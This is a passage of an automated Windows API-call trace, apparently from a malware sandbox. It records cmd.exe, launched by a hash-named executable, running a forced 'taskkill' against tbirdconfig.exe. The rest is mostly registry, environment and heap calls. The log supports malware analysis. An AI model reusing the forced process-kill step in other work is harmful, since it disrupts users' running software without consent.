lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0182.104] GetConsoleOutputCP () returned 0x1b5 [0182.109] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0182.109] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0182.109] _get_osfhandle (_FileHandle=1) returned 0x130 [0182.109] SetConsoleMode (hConsoleHandle=0x130, dwMode=0x0) returned 0 [0182.109] _get_osfhandle (_FileHandle=1) returned 0x130 [0182.109] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0182.110] _get_osfhandle (_FileHandle=0) returned 0x158 [0182.110] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0182.110] GetEnvironmentStringsW () returned 0x5c7fe8* [0182.110] GetProcessHeap () returned 0x5c0000 [0182.110] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa1a) returned 0x5c8a10 [0182.110] FreeEnvironmentStringsA (penv="A") returned 1 [0182.110] GetProcessHeap () returned 0x5c0000 [0182.110] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x4) returned 0x5c3420 [0182.110] GetEnvironmentStringsW () returned 0x5c7fe8* [0182.110] GetProcessHeap () returned 0x5c0000 [0182.110] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa1a) returned 0x5c9438 [0182.111] FreeEnvironmentStringsA (penv="A") returned 1 [0182.111] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0182.111] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0182.111] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0182.111] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0182.111] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0182.111] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0182.111] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0182.111] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0182.111] RegCloseKey (hKey=0x88) returned 0x0 [0182.112] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0182.112] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0182.112] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0182.112] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0182.112] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0182.112] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0182.112] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0182.112] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0182.112] RegCloseKey (hKey=0x88) returned 0x0 [0182.113] time (in: timer=0x0 | out: timer=0x0) returned 0x62344224 [0182.113] srand (_Seed=0x62344224) [0182.113] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im tbirdconfig.exe \"" [0182.113] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im tbirdconfig.exe \"" [0182.113] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0182.113] GetProcessHeap () returned 0x5c0000 [0182.113] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x210) returned 0x5c6fc0 [0182.113] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5c6fc8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0182.113] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0182.113] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0182.113] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0182.114] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0182.114] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0182.114] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0182.114] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0182.114] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0182.114] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0182.114] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0182.114] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0182.114] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0182.115] GetProcessHeap () returned 0x5c0000 [0182.115] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c8a10) returned 1 [0182.115] GetEnvironmentStringsW () returned 0x5c7fe8* [0182.115] GetProcessHeap () returned 0x5c0000 [0182.115] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa32) returned 0x5ca8a0 [0182.116] FreeEnvironmentStringsA (penv="A") returned 1 [0182.116] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0182.117] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0182.117] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0182.117] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0182.117] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0182.117] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0182.117] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0182.117] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0182.117] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0182.117] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0182.117] GetProcessHeap () returned 0x5c0000 [0182.117] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x44) returned 0x5c7e70 [0182.117] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0182.117] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0182.118] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0182.118] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5c71d8 [0182.118] FindClose (in: hFindFile=0x5c71d8 | out: hFindFile=0x5c71d8) returned 1 [0182.118] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x5c71d8 [0182.118] FindClose (in: hFindFile=0x5c71d8 | out: hFindFile=0x5c71d8) returned 1 [0182.119] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0182.119] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5c71d8 [0182.119] FindClose (in: hFindFile=0x5c71d8 | out: hFindFile=0x5c71d8) returned 1 [0182.119] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0182.119] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0182.119] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0182.119] GetProcessHeap () returned 0x5c0000 [0182.120] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5ca8a0) returned 1 [0182.120] GetEnvironmentStringsW () returned 0x5c7fe8* [0182.120] GetProcessHeap () returned 0x5c0000 [0182.120] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xa76) returned 0x5c9e60 [0182.120] FreeEnvironmentStringsA (penv="=") returned 1 [0182.120] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0182.120] GetProcessHeap () returned 0x5c0000 [0182.121] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5c7e70) returned 1 [0182.121] GetProcessHeap () returned 0x5c0000 [0182.121] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x400e) returned 0x5cbd60 [0182.121] GetProcessHeap () returned 0x5c0000 [0182.121] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x52) returned 0x5c71d8 [0182.122] GetProcessHeap () returned 0x5c0000 [0182.122] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x4008) returned 0x5cfd78 [0182.122] GetProcessHeap () returned 0x5c0000 [0182.122] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x4008) returned 0x5d3d88 [0182.124] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0182.125] GetProcessHeap () returned 0x5c0000 [0182.125] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x418) returned 0x5ca8e0 [0182.125] SetErrorMode (uMode=0x0) returned 0x8003 [0182.125] SetErrorMode (uMode=0x1) returned 0x0 [0182.125] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x5ca8e8, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0182.125] SetErrorMode (uMode=0x8003) returned 0x1 [0182.125] GetProcessHeap () returned 0x5c0000 [0182.125] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5ca8e0, Size=0x84) returned 0x5ca8e0 [0182.125] GetProcessHeap () returned 0x5c0000 [0182.125] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5ca8e0) returned 0x84 [0182.126] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0182.126] GetProcessHeap () returned 0x5c0000 [0182.126] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x62) returned 0x5c7238 [0182.126] GetProcessHeap () returned 0x5c0000 [0182.126] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xb8) returned 0x5ca970 [0182.126] GetProcessHeap () returned 0x5c0000 [0182.126] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5ca970, Size=0x62) returned 0x5ca970 [0182.126] GetProcessHeap () returned 0x5c0000 [0182.126] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5ca970) returned 0x62 [0182.126] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0182.126] GetProcessHeap () returned 0x5c0000 [0182.126] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xe0) returned 0x5ca9e0 [0182.131] GetProcessHeap () returned 0x5c0000 [0182.131] RtlReAllocateHeap (Heap=0x5c0000, Flags=0x0, Ptr=0x5ca9e0, Size=0x76) returned 0x5ca9e0 [0182.131] GetProcessHeap () returned 0x5c0000 [0182.131] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5ca9e0) returned 0x76 [0182.131] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0182.131] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im tbirdconfig.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0182.131] GetLastError () returned 0x3 [0182.131] GetProcessHeap () returned 0x5c0000 [0182.132] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5cfd78) returned 1 [0182.133] GetProcessHeap () returned 0x5c0000 [0182.133] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5d3d88) returned 1 [0182.135] GetProcessHeap () returned 0x5c0000 [0182.135] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5cbd60) returned 1 [0182.135] GetConsoleOutputCP () returned 0x1b5 [0182.174] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0182.174] GetUserDefaultLCID () returned 0x409 [0182.174] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0182.174] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0182.174] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0182.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0182.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0182.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0182.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0182.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0182.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0182.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0182.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0182.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0182.175] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0182.175] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0182.175] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0182.176] GetProcessHeap () returned 0x5c0000 [0182.176] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20c) returned 0x5caa60 [0182.177] GetConsoleTitleW (in: lpConsoleTitle=0x5caa60, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0182.178] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0182.178] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0182.178] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0182.178] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0182.178] GetProcessHeap () returned 0x5c0000 [0182.178] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x400a) returned 0x5cbd60 [0182.178] GetProcessHeap () returned 0x5c0000 [0182.179] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5cbd60) returned 1 [0182.180] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0182.180] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0182.180] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0182.180] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0182.180] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0182.180] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0182.180] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0182.180] GetProcessHeap () returned 0x5c0000 [0182.180] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x58) returned 0x5cac78 [0182.180] GetProcessHeap () returned 0x5c0000 [0182.180] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x1a) returned 0x5cacd8 [0182.181] GetProcessHeap () returned 0x5c0000 [0182.181] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x3a) returned 0x5cad00 [0182.182] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0182.184] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0182.184] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0182.184] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0182.184] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0182.184] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0182.184] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0182.184] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0182.184] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0182.184] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0182.184] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0182.184] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0182.184] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0182.184] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0182.184] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0182.184] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0182.184] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0182.184] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0182.184] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0182.184] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0182.184] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0182.184] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0182.184] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0182.184] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0182.185] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0182.185] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0182.185] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0182.185] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0182.185] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0182.185] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0182.185] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0182.185] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0182.185] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0182.185] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0182.185] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0182.185] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0182.185] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0182.185] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0182.185] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0182.185] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0182.185] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0182.185] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0182.185] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0182.185] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0182.185] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0182.185] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0182.185] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0182.185] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0182.185] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0182.185] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0182.185] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0182.185] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0182.186] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0182.186] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0182.186] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0182.186] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0182.186] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0182.186] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0182.186] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0182.186] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0182.186] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0182.186] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0182.186] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0182.186] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0182.186] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0182.186] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0182.186] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0182.186] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0182.186] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0182.186] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0182.186] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0182.186] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0182.186] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0182.186] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0182.186] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0182.186] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0182.187] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0182.187] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0182.187] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0182.187] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0182.187] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0182.187] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0182.187] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0182.187] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0182.187] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0182.187] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0182.187] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0182.187] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0182.187] GetProcessHeap () returned 0x5c0000 [0182.187] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x210) returned 0x5cad48 [0182.187] 